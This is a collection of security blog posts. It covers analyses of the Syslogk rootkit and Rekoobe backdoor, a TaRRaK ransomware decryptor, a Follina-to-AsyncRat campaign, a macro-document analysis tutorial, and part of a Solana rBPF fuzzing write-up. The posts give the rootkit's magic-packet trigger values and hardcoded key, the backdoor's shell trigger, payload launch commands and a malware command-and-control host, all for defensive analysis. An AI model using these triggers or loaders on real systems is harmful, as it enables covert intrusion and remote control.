The Virtual File System (VFS) is an abstraction layer that allows for FS-like operation over something that is typically not a traditional FS. As it is the entry point for all the File System queries, it is a good candidate for the rootkits to hook.

It is not surprising that the Syslogk rootkit hooks the VFS functions for hiding the Rekoobe payload stored in the file /etc/rc-Zobk0jpi/PgSD93ql .

The hook is done by hk_root_readdir which calls to nw_root_filldir where the directory filtering takes place.

As you can see, any directory containing the substring -Zobk0jpi will be hidden.

The function hk_get_vfs opens the root of the file system by using filp_open. This kernel function returns a pointer to the structure file, which contains a file_operations structure called f_op that finally stores the readdir function hooked via hk_root_readdir.

Of course, this feature is not new at all. You can check the source code of Adore-Ng and see how it is implemented on your own.

Understanding the process hiding mechanism

In the following screenshot, you can see that the Syslogk rootkit (code at the right margin of the screenshot) is prepared for hiding a process called PgSD93ql. Therefore, the rootkit seems more straightforward than the original version (see Adore-Ng at the left margin of the screenshot). Furthermore, the process to hide can be selected after authenticating with the rootkit.

The Syslogk rootkit function hk_getpr explained above, is a mix of adore_find_task and should_be_hidden functions but it uses the same mechanism for hiding processes.

Understanding the network traffic hiding mechanism

The Adore-Ng rootkit allows hiding a given set of listening services from Linux programs like Netstat. It uses the exported proc_net structure to change the tcp4_seq_show( ) handler, which is invoked by the kernel when Netstat queries for listening connections. Within the adore_tcp4_seq_show() function, strnstr( ) is used to look in seq->buf for a substring that contains the hexadecimal representation of the port it is trying to hide. If this is found, the string is deleted.

In this way, the backdoor will not appear when listing the connections in an infected machine. The following section describes other interesting capabilities of this rootkit.

Understanding the magic packets

Instead of continuously running the payload, it is remotely started or stopped on demand by sending specially crafted network traffic packets.

These are known as magic packets because they have a special format and special powers. In this implementation, an attacker can trigger actions without having a listening port in the infected machine such that the commands are, in some way, ‘magically’ executed in the system.

Starting the Rekoobe payload

The magic packet inspected by the Syslogk rootkit for starting the Rekoobe fake SMTP server is straightforward. First, it checks whether the packet is a TCP packet and, in that case, it also checks the source port, which is expected to be 59318.

Rekobee will be executed by the rootkit if the magic packet fits the mentioned criteria.

Of course, before executing the fake service, the rootkit terminates all existing instances of the program by calling the rootkit function pkill_clone_0. This function contains the hardcoded process name PgSD93ql;  it only kills the Rekoobe process by sending the KILL signal via send_sig.

To execute the command that starts the Rekoobe fake service in user mode, the rootkit executes the following command by combining the kernel APIs: call_usermodehelper_setup, call_usermodehelper_setfns, and call_usermodehelper_exec.

/bin/sh -c /etc/rc-Zobk0jpi/PgSD93ql

The Files section of this post demonstrates how to manually craft (using Python) the TCP magic packet for starting the Rekoobe payload.

In the next section we describe a more complex form of the magic packet.

Stopping the Rekoobe payload

Since the attacker doesn’t want any other person in the network to be able to kill Rekoobe, the magic packet for killing Rekoobe must match some fields in the previous magic packet used for starting Rekoobe. Additionally, the packet must satisfy additional requirements – it must contain a key that is hardcoded in the rootkit and located in a variable offset of the magic packet. The conditions that are checked:

  1. It checks a flag enabled when the rootkit executes Rekoobe via magic packets. It will only continue if the flag is enabled.
  2. It checks the Reserved field of the TCP header to see that it is 0x08.
  3. The Source Port must be between 63400 and 63411 inclusive.
  4. Both the Destination Port and the Source Address, must to be the same that were used when sending the magic packet for starting Rekoobe.
  5. Finally, it looks for the hardcoded key. In this case, it is: D9sd87JMaij

The offset of the hardcoded key is also set in the packet and not in a hardcoded offset; it is calculated instead. To be more precise, it is set in the data offset byte (TCP header) such that after shifting the byte 4 bits to the right and multiplying it by 4, it points to the offset of where the Key is expected to be (as shown in the following screenshot, notice that the rootkit compares the Key in reverse order).

In our experiments, we used the value 0x50 for the data offset (TCP header) because after shifting it 4 bits, you get 5 which multiplied by 4 is equal to 20. Since 20 is precisely the size of the TCP Header, by using this value, we were able to put the key at the start of the data section of the packet.

If you are curious about how we implemented this magic packet from scratch, then please see the Files section of this blog post.

Analyzing Rekoobe

When the infected machine receives the appropriate magic packet, the rootkit starts the hidden Rekoobe malware in user mode space.

It looks like an innocent SMTP server, but there is a backdoor command on it that can be executed when handling the starttls command. In a legitimate service, this command is sent by the client to the server to advise that it wants to start TLS negotiation.

For triggering the Rekoobe backdoor command (spawning a shell), the attacker must send the byte 0x03 via TLS, followed by a Tag Length Value (TLV) encoded data. Here, the tag is the symbol %, the length is specified in four numeric characters, and the value (notice that the length and value are arbitrary but can not be zero).

Additionally, to establish the TLS connection, you will need the certificate embedded in Rekoobe.

See the Files section below for the certificate and a Python script we developed to connect with Rekoobe.

The origin of Rekoobe payload and Syslogk rootkit

Rekoobe is clearly based on the TinySHell open source project; this is based on ordering observed in character and variables assignment taking place in the same order multiple times.

On the other hand, if you take a look at the Syslogk rootkit, even if it is new, you will notice that there are also references to TinySHell dating back to December 13, 2018.

The evidence suggests that the threat actor developed Rekoobe and Syslogk to run them  together. We are pleased to say that our users are protected and hope that this research assists others.


One of the architectural advantages of security software is that it usually has components running in different privilege levels; malware running on less-privileged levels cannot easily interfere with processes running on higher privilege levels, thus allowing more straightforward dealing with malware.

On the other hand, kernel rootkits can be hard to detect and remove because these pieces of malware run in a privileged layer. This is why it is essential for system administrators and security companies to be aware of this kind of malware and write protections for their users as soon as possible.


Syslogk sample

  • 68facac60ee0ade1aa8f8f2024787244c2584a1a03d10cda83eeaf1258b371f2

Rekoobe sample

  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d

Other Rekoobe samples

  • fa94282e34901eba45720c4f89a0c820d32840ae49e53de8e75b2d6e78326074
  • fd92e34675e5b0b8bfbc6b1f3a00a7652e67a162f1ea612f6e86cca846df76c5
  • 12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5
  • 06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e
  • f1a592208723a66fa51ce1bc35cbd6864e24011c6dc3bcd056346428e4e1c55d
  • 55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b
  • df90558a84cfcf80639f32b31aec187b813df556e3c155a05af91dedfd2d7429
  • 160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421
  • b4d0f0d652f907e4e77a9453dcce7810b75e1dc5867deb69bea1e4ecdd02d877
  • 3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65
  • 74699b0964a2cbdc2bc2d9ca0b2b6f5828b638de7c73b1d41e7fe26cfc2f3441
  • 7a599ff4a58cb0672a1b5e912a57fcdc4b0e2445ec9bc653f7f3e7a7d1dc627f
  • f4e3cfeeb4e10f61049a88527321af8c77d95349caf616e86d7ff4f5ba203e5f
  • 31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a
  • c6d735b7a4656a52f3cd1d24265e4f2a91652f1a775877129b322114c9547deb
  • 2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8
  • b22f55e476209adb43929077be83481ebda7e804d117d77266b186665e4b1845
  • a93b9333a203e7eed197d0603e78413013bd5d8132109bbef5ef93b36b83957c
  • 870d6c202fcc72088ff5d8e71cc0990777a7621851df10ba74d0e07d19174887
  • ca2ee3f30e1c997cc9d8e8f13ec94134cdb378c4eb03232f5ed1df74c0a0a1f0
  • 9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d
  • 29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962
  • 7e0b340815351dab035b28b16ca66a2c1c7eaf22edf9ead73d2276fe7d92bab4
  • af9a19f99e0dcd82a31e0c8fc68e89d104ef2039b7288a203f6d2e4f63ae4d5c
  • 6f27de574ad79eb24d93beb00e29496d8cfe22529fc8ee5010a820f3865336a9
  • d690d471b513c5d40caef9f1e37c94db20e6492b34ea6a3cddcc22058f842cf3
  • e08e241d6823efedf81d141cc8fd5587e13df08aeda9e1793f754871521da226
  • da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08
  • e3d64a128e9267640f8fc3e6ba5399f75f6f0aca6a8db48bf989fe67a7ee1a71
  • d3e2e002574fb810ac5e456f122c30f232c5899534019d28e0e6822e426ed9d3
  • 7b88fa41d6a03aeda120627d3363b739a30fe00008ce8d848c2cbb5b4473d8bc
  • 50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7
  • 8b036e5e96ab980df3dca44390d6f447d4ca662a7eddac9f52d172efff4c58f8
  • 8b18c1336770fcddc6fe78d9220386bce565f98cc8ada5a90ce69ce3ddf36043
  • f04dc3c62b305cdb4d83d8df2caa2d37feeb0a86fb5a745df416bac62a3b9731
  • 72f200e3444bb4e81e58112111482e8175610dc45c6e0c6dcd1d2251bacf7897
  • d129481955f24430247d6cc4af975e4571b5af7c16e36814371575be07e72299
  • 6fc03c92dee363dd88e50e89062dd8a22fe88998aff7de723594ec916c348d0a
  • fca2ea3e471a0d612ce50abc8738085f076ad022f70f78c3f8c83d1b2ff7896b
  • 2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470
  • 178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a
  • 3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4
  • 14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7
  • 8bb7842991afe86b97def19f226cb7e0a9f9527a75981f5e24a70444a7299809
  • 020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67
  • 6711d5d42b54e2d261bb48aa7997fa9191aec059fd081c6f6e496d8db17a372a
  • 48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc
  • b0d69e260a44054999baa348748cf4b2d1eaab3dd3385bb6ad5931ff47a920de
  • e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94
  • fa0ea232ab160a652fcbd8d6db8ffa09fd64bcb3228f000434d6a8e340aaf4cb
  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d
  • 73bbabc65f884f89653a156e432788b5541a169036d364c2d769f6053960351f
  • 8ec87dee13de3281d55f7d1d3b48115a0f5e4a41bfbef1ea08e496ac529829c8
  • 8285ee3115e8c71c24ca3bdce313d3cfadead283c31a116180d4c2611efb610d
  • 958bce41371b68706feae0f929a18fa84d4a8a199262c2110a7c1c12d2b1dce2
  • 38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75
  • bcc3d47940ae280c63b229d21c50d25128b2a15ea42fe8572026f88f32ed0628
  • 08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a
  • cf525918cb648c81543d9603ac75bc63332627d0ec070c355a86e3595986cbb3
  • 42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42
  • 337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6
  • 4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b
  • 5b8059ea30c8665d2c36da024a170b31689c4671374b5b9b1a93c7ca47477448
  • bd07a4ccc8fa67e2e80b9c308dec140ca1ae9c027fa03f2828e4b5bdba6c7391
  • bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e
  • 79916343b93a5a7ac7b7133a26b77b8d7d0471b3204eae78a8e8091bfe19dc8c
  • c32e559568d2f6960bc41ca0560ac8f459947e170339811804011802d2f87d69
  • 864c261555fce40d022a68d0b0eadb7ab69da6af52af081fd1d9e3eced4aee46
  • 275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9
  • 031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9


Syslogk research tools

Rekoobe research tool

IoC repository

The Syslogk and Rekoobe rootkit research tools and IoCs are in our IoC repository.

The post Linux Threat Hunting: ‘Syslogk’ a kernel rootkit found under development in the wild appeared first on Avast Threat Labs.

Decrypted: TaRRaK Ransomware

6 June 2022 at 12:10

The TaRRaK ransomware appeared in June of 2021. This ransomware contains many coding errors, so we decided to publish a small blog about them. Samples of this ransomware were spotted in our user base, so we also created a decryptor for this ransomware.

Skip to instructions on how to use the TaRRaK decryptor.

Behavior of the ransomware

The ransomware is written in .NET. The binary is very clean and contains no protections or obfuscations. When executed, the sample creates a mutex named TaRRaK in order to ensure that only one instance of the malware is executed. Also, an auto-start registry entry is created in order to execute the ransomware on every user login:

The ransomware contains a list of 178 file types (extensions) that, when found, are encrypted:

3ds 7z 7zip acc accdb ai aif apk asc asm asf asp aspx avi backup bak bat bin bmp c cdr cer cfg cmd cpp crt crw cs csproj css csv cue db db3 dbf dcr dds der dmg dng doc docm docx dotx dwg dxf dxg eps epub erf flac flv gif gpg h html ico img iso java jpe jpeg jpg js json kdc key kml kmz litesql log lua m3u m4a m4u m4v max mdb mdf mef mid mkv mov mp3 mp4 mpa mpeg mpg mrw nef nrw obj odb odc odm odp ods odt orf p12 p7b p7c part pdb pdd pdf pef pem pfx php plist png ppt pptm pptx ps ps1 psd pst ptx pub pri py pyc r3d raf rar raw rb rm rtf rwl sav sh sln suo sql sqlite sqlite3 sqlitedb sr2 srf srt srw svg swf tga thm tif tiff tmp torrent txt vbs vcf vlf vmx vmdk vdi vob wav wma wmi wmv wpd wps x3f xlk xlm xls xlsb xlsm xlsx xml zip

The ransomware avoids folders containing one the following strings:

  • All Users\Microsoft\
  • $Recycle.Bin
  • :\Windows
  • \Program Files
  • Temporary Internet Files
  • \Local\Microsoft\
  • :\ProgramData\

Encrypted files are given a new extension .TaRRaK. They also contain the TaRRaK signature at the beginning of the encrypted file:

File Encryption

Implementation of the encryption is a nice example of a buggy code:

First, the ransomware attempts to read the entire file to memory using File.ReadAllBytes(). This function has an internal limit – a maximum of 2 GB of data can be loaded. In case the file is larger, the function throws an exception, which is then handled by the try-catch block. Unfortunately, the try-catch block only handles a permission-denied condition. So it adds an ACL entry granting full access to everyone and retries the read data operation. In case of any other error (read failure, sharing violation, out of memory, read from an offline file), the exception is raised again and the ransomware is stuck in an infinite loop.

Even if the data load operation succeeds and the file data can be fit in memory, there’s another catch. The Encrypt function converts the array of bytes to an array of 32-bit integers:

So it allocates another block of memory with the same size as the file size. It then performs an encryption operation, using a custom encryption algorithm. Encrypted Uint32 array is converted to another array of bytes and written to the file. So in addition to the memory allocation for the original file data, two extra blocks are allocated. If any of the memory allocations fails, it throws an exception and the ransomware is again stuck in an infinite loop.

In the rare case when the encryption process finishes (no sharing violation or another error), the ransom note file named Encrypted Files by TaRRaK.txt is dropped to the root folder of each drive:

Files with the .TaRRaK extension are associated with their own icon:

Finally, desktop wallpaper is set to the following bitmap:

How to use the Avast decryptor to decrypt files encrypted by TaRRaK Ransomware

To decrypt your files, follow these steps:

  1. You must be logged to the same user account like the one under which the files were encrypted.
  2. Download the free Avast decryptor for 32-bit or 64-bit Windows.
  3. Run the executable file. It starts in the form of a wizard, which leads you through the configuration of the decryption process.
  4. On the initial page, you can read the license information, if you want, but you really only need to click “Next”
  1. On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:
  1. On the final page, you can opt-in to backup encrypted files. These backups may help if anything goes wrong during the decryption process. This option is turned on by default, which we recommend. After clicking “Decrypt”, the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.



The post Decrypted: TaRRaK Ransomware appeared first on Avast Threat Labs.

Outbreak of Follina in Australia

Our threat hunters have been busy searching for abuse of the recently-released zero-day remote code execution bug in Microsoft Office (CVE-2022-30190). As part of their investigations, they found evidence of a threat actor hosting malicious payloads on what appears to be an Australian VOIP telecommunications provider with a presence in the South Pacific nation of Palau.

Further analysis indicated that targets in Palau were sent malicious documents that, when opened, exploited this vulnerability, causing victim computers to contact the provider’s website, download and execute the malware, and subsequently become infected.

Key Observations

This threat was a complex multi-stage operation utilizing LOLBAS (Living off the Land Binaries And Scripts), which allowed the attacker to initialize the attack using the CVE-2022-30190 vulnerability within the Microsoft Support Diagnostic Tool. This vulnerability enables threat actors to run malicious code without the user downloading an executable to their machine which might be detected by endpoint detection.

Multiple stages of this malware were signed with a legitimate company certificate to add additional legitimacy and minimize the chance of detection.

First stage

The compromised website, as pictured in the screenshot below, was used to host robots.txt which is an executable which was disguised as “robots.txt”. We believe the name was used to conceal itself from detection if found in network logs. Using the Diagnostics Troubleshooting Wizard (msdt.exe), this file “robots.txt” was downloaded and saved as the file (Sihost.exe) and then executed.

Second Stage, Sihost.exe

When the renamed “robots.txt” – “Sihost.exe” – was executed by msdt.exe it downloaded the second stage of the attack which was a loader with the hash b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447. This executable was then used to download and decrypt the third stage of the attack, an encrypted file stored as ‘favicon.svg’ on the same web server.

Third stage, favicon.svg

After this file has been decrypted, it is used to download the fourth stage of the attack from[.]au. These files are named Sevntx64.exe and Sevntx.lnk, which are then executed on the victims’ machine.

Fourth Stage, Sevntx64.exe and Sevntx64.lnk

When the file is executed, it loads a 66kb shellcode from the AsyncRat malware family; Sevntx64.exe is signed with the same compromised certificate as seen previously in “robots.txt”.

The screenshot below shows the executable loading the shellcode.

Final Stage, AsyncRat

When the executable is loaded, the machine has been fully compromised with AsyncRat; the trojan is configured to communicate with the server palau[.]voipstelecom[.]com[.]au on port 443

AsyncRat SHA256:


Screenshot below with AsyncRat configuration:


We highly recommend Avast Software to protect against the latest threats, and Microsoft patches to protect your Windows systems from the latest CVE-2022-30190 vulnerability.


item sha256
main webpage 0af202af06aef4d36ea151c5a304414a67aee18c3675286275bd01d11a760c04 
robots.txt b63fbf80351b3480c62a6a5158334ec8e91fecd057f6c19e4b4dd3febaa9d447 
favicon.svg ed4091700374e007ae478c048734c4bc0b7fe0f41e6d5c611351bf301659eee0
decrypted favicon.svg 9651e604f972e36333b14a4095d1758b50decda893e8ff8ab52c95ea89bb9f74
Sevntx64.exe f3ccf22db2c1060251096fe99464002318baccf598b626f8dbdd5e7fd71fd23f 
Sevntx64.lnk 33297dc67c12c7876b8052a5f490cc6a4c50a22712ccf36f4f92962463eb744d 
shellcode from Sevntx64.exe (66814 bytes) 7d6d317616d237ba8301707230abbbae64b2f8adb48b878c528a5e42f419133a
asyncrat aba9b566dc23169414cb6927ab5368b590529202df41bfd5dded9f7e62b91479


We managed to find an earlier version of this malware.

file hash first seen country
Grievance Against Lawyers, Judge or Justice.doc.exe (signed) 87BD2DDFF6A90601F67499384290533701F5A5E6CB43DE185A8EA858A0604974  26.05.2022 NL, proxy
Grievance Against Lawyers, Judge or Justice (1).zip\Grievance Against Lawyers, Judge or Justice.doc.exe 0477CAC3443BB6E46DE9B904CBA478B778A5C9F82EA411D44A29961F5CC5C842 18.05.2022 Palau, previous victim

Forensic information from the lnk file:

field value
Application Sevntx64.exe
Accessed time 2022-05-19 09:34:26
Birth droid MAC address 00:0C:29:59:3C:CC
Birth droid file ID 0e711e902ecfec11954f000c29593ccc
Birth droid volume ID b097e82425d6c944b33e40f61c831eaf
Creation time 2022-05-19 10:29:34
Drive serial number 0xd4e21f4f
Drive type DRIVE_FIXED
Droid file ID 0e711e902ecfec11954f000c29593ccc
Droid volume ID b097e82425d6c944b33e40f61c831eaf
Known folder ID af2448ede4dca84581e2fc7965083634
Link flags EnableTargetMetadata, HasLinkInfo, HasRelativePath, HasTargetIDList, HasWorkingDir, IsUnicodeLocal
base path C:\Users\Public\Documents\Sevntx64.exe
Location Local
MAC address 00:0C:29:59:3C:CC
Machine identifier desktop-eev1hc3
Modified time 2020-08-19 04:13:44
Relative path .\Sevntx64.exe
Size 1543
Target file size 376368
Working directory C:\Users\Public\Documents

The post Outbreak of Follina in Australia appeared first on Avast Threat Labs.

Malicious Document Analysis: Example 2

14 January 2022 at 16:45

I returned to write the second article of Malware Analysis Series (MAS) last January/08 after receiving an outstanding support from a high-profile professional and company of the industry, but while the article is not ready (I working on page 43 and far from the end), I spent a couple of hours writing a simple and short article on malicious document analysis. I hope it helps someone.

The PDF version is available on:

Keep reversing and have an excellent day.

Alexandre Borges.

Malware Analysis Series (MAS) – Article 1

3 December 2021 at 08:17

The first article of MAS (Malware Analysis Series) is available for reading from:


Soon I have enough time, so I’ll publish an HTML version of it.

Have an excellent day.

Alexandre Borges.

PS: this is a live document, so new versions of it will be published soon errors and mistakes are found.

Malicious Document Analysis: Example 1

2 November 2021 at 20:21

The PDF version of this article can be found here:


While the first article of MAS (Malware Analysis Series)
is not ready, I’m leaving here a very simple case of malicious document analysis for helping my Twitter followers and any professional interested in learning how to analyze this kind of artifact.

Before starting the analysis, I’m going to use the following environment and tools:

Furthermore, it’s always recommended to install Oletools (from Decalage — @decalage2):

# python -m pip install -U oletools

All three tools above are usually installed on REMnux by default. However, if you are using Ubuntu or any other Linux distribution, so you can install them through links and command above.

Like any common binary, we can analyze any maldoc using static or dynamic analysis, but as my preferred approach is always the former one, so let’s take it.

We’ll be analyzing the following sample: 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Downloading sample and gathering information

The first step is getting general information about this hash by using any well-known endpoint such as
Virus Total, Hybrid Analysis, Triage, Malware Bazaar
and so on. Therefore, let’s use Malwoverview to do it on the command line and collect information from Malware Bazaar that, fortunately, also brings information from excellent Triage:

remnux@remnux:~/articles$ -b 1 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Analyzing the malicious document

Given the output above, we could try to make an assumption that the dropped executable comes from the own maldoc because Microsoft Office loads VBA resource, possible macro or embedded object present. Furthermore, the maldoc seems to elevate privilege (AdjustPrivilege( )), hook (intercept events) by installing a hook procedure into a hook chain (SetWindowsHookEx( )), maybe it makes code injection (WriteProcessMemory( )), so we it’s reasonable to assume these Triage signatures are associate to the an embedded executable. Therefore it’s time to download the malicious document from Triage (you can do it from website, if you wish):

remnux@remnux:~/articles$ -b 5 -B 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc

Uncompress it by executing the following command (password is “infected“) and collect information using olevba tool:

remnux@remnux:~/articles$ 7z e

Using olevba and oleid (from
) to collect further information we have the following outputs:

remnux@remnux:~/articles$ olevba -a 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx

remnux@remnux:~/articles$ oleid 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx

From both previous outputs, important facts come up:

  • Some code is executed when the MS Word is executed.
  • A file seems to be written to the file system.
  • The maldoc seems to open a file (probably the same written above).
  • VBA macros are responsible for the entire activity.

The next step is to analyze the maldoc, which is a OLE document, we are going use (from Didier Steven’s suite — @DidierStevens) to check the OLE’s internals and try to understand what’s happening:

According to the figure above we have:

  • three macros in 16, 17 and 18.
  • a big “content” in 11, which could be one of “VBA resources” mentioned Triage’s output.
  • Once again, we can decide to use dynamic analysis (a debugger) or static analysis to expose the real threat hidden inside this malicious document, but let’s proceed with static analysis because it will bring more details while addressing the problem.

In the next step we need to check the macros’ content by uncompressing their contents (-v option) using

remnux@remnux:~/articles$ -s 16 -v 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx | more

There’re few details that can be observed from output above:

  • Obviously the code is obfuscated.
  • The Split function, which returns a zero-based and one-dimensional array containing substrings, manipulates the content from UserForm1 (object 11) and, apparently, this content is divided in four parts (TextBox1, TextBox2, TextBox3 and TextBox4). In addition, the UserForm1 content seems to be separated by “!” character.
  • The UserForm2 is also being (TextBox1 and TextBox2) in a MoveFile operation.
  • The Winmgmt service, which is a WMI service operating inside the svchost process under LocalSystem account, is being used to execute an operation given by UserForm2.TextBox5.
  • The UserForm2.Text6 is used to create a reference to an object provided by ActiveX.
  • The UserForm2.Text7 is being used to save some content as a binary file.

Therefore we must investigate the content of object 15 (Macros/UserForm2/o):

remnux@remnux:~/articles$ 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 15 -d | strings


We can infer from figure above that:

  • UserForm2.Text1: C:\Users\Public\Pictures\winword.con
  • UserForm2.Text2: C:\Users\Public\Pictures\winword.exe
  • We are moving
    to winword.exe
    within C:\Users\Public\Pictures\ directory.
  • UserForm2.Text3: Scripting.FileSystemObject
  • UserForm2.Text4: winmgmts:{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2}
  • UserForm2.Text5: Win32_ProcessStartup
  • UserForm2.Text6: winmgmts:root\cimv2:Win32_Process
  • UserForm2.Text7: ADODB.Stream

The remaining macros don’t hold nothing really critical for our analysis this time:

remnux@remnux:~/articles$ 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 17 -v | strings | tail +9

remnux@remnux:~/articles$ 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 18 -v | strings | tail +9

Analyzing the image above (check SaveBinaryData()
function) and previous figures, it’s reasonable to assume that an executable, which we don’t know yet, will be saved as and later it will be renamed to winword.exe within C:\Users\Public\Pictures\ directory. Finally, the binary will be executed by calling objProcess.create() function.

At this point, we should verify the content of object 11 (check “Macros/UserForm1/o“) because it likely contain our “hidden” executable. Thus, run the following command:

remnux@remnux:~/articles$ 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d | more

As we expected and mentioned previously, these decimal numbers are separated by “!” character.

Additionally, there’s a catch: according to last figure, this object has 4 parts (UserForm1.Text1, UserForm1.Text2, UserForm1.Text3 and UserForm1.Text4), so we should dump it into a file (dump1), edit and “join” all parts.

To dump the “object 11” into a file (named dump1) execute the following command: :

remnux@remnux:~/articles$ 59ed41388826fed419cc3b18d28707491a4fa51309935c4fa016e53c6f2f94bc.docx -s 11 -d > dump1

We need to “clean up” dump1 file:

  • Editing the file using “vi” command or any other editor.
  • Using “$” to go to the end of each line.
  • Removing occurrences of “Tahoma” word and any garbage (easily identified) from the text.
  • Join this line with the next one (“J” command on “vi“)

After editing the dump1 file, we have two replace all “!” characters by commas, and transform all decimal numbers into hex bytes. First, replace all “!” characters by comma using a simple “sed” command:

remnux@remnux:~/articles$ sed -e ‘s/!/,/g’ dump1 > dump3

remnux@remnux:~/articles$ cat dump3 | more

From this point we have to process and transform this file (dump3) to something useful end we have two clear options:

I’m going to show you both methods, though I always prefer programming a small script. Please, pay attention to the fact that all decimal numbers are separated by comma, so it will demand an extra concern during the decoding operation.

To decode this file on CyberChef you have to:

  • Load it onto CyberChef’s input pane. There’s an button on top-right to do it.
  • Pick up “From Decimal” operation and configure the delimiter to “Comma”.

Afterwards, you’ll see an executable in the Output pane, which can be saved onto file system.

Saving the file from Output pane, save the file and check its type:

remnux@remnux:~/Downloads$ file download.dat

download.dat: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

It’s excellent! Let’s now write a simple Python code named to perform the same operation and get the same result:

remnux@remnux:~/articles$ python3.8 ./

remnux@remnux:~/articles$ file final_file.bin

final_file.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

As we expected, it’s worked! Finally, let’s check the final binary on Virus Total and Triage to learn a bit further about the extracted binary (next figures):

It would be super easy to extract the same malware from the maldoc by using dynamic analysis. You’ll find out that a password is protecting the VBA Project, but this quite trivial to remove this kind of protection:

That’s it! I hope you have learned something new from this article and see you at next next one.         



The start

7 September 2021 at 19:23

“Long is the way and hard, that out of hell leads up to light.”

(by John Milton from Paradise Lost — 1667)

My name is Alexandre Borges and I’m a security researcher focused on reverse engineering, exploit development and programming. Therefore, I’ll try to keep this blog updated and including write-up’s about these topics.

Honestly, I hope you can learn something from my posts.

Please, you should feel free to contact me and comment about any mistake and inaccuracy.

Have an excellent day.



Earn $200K by fuzzing for a weekend: Part 2

By: addison
11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found in approximately two hours of fuzzer start.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forceably terminated. As a result, the leaking program was running out this meter at exactly the call instruction.

A faulty optimisation

There is a wall of text at line 420 of which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call in order to reduce the amount of times they update and check the meter. This optimisation is totally reasonable; we don’t care if we run out of instructions at the middle of a block because the subsequent instructions are still “safe”, and if we ever hit an exit that’s the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

  1. increase r0 (which starts at 0) by 255
  2. jump back to the previous instruction if r0 is less than or equal to 8355838
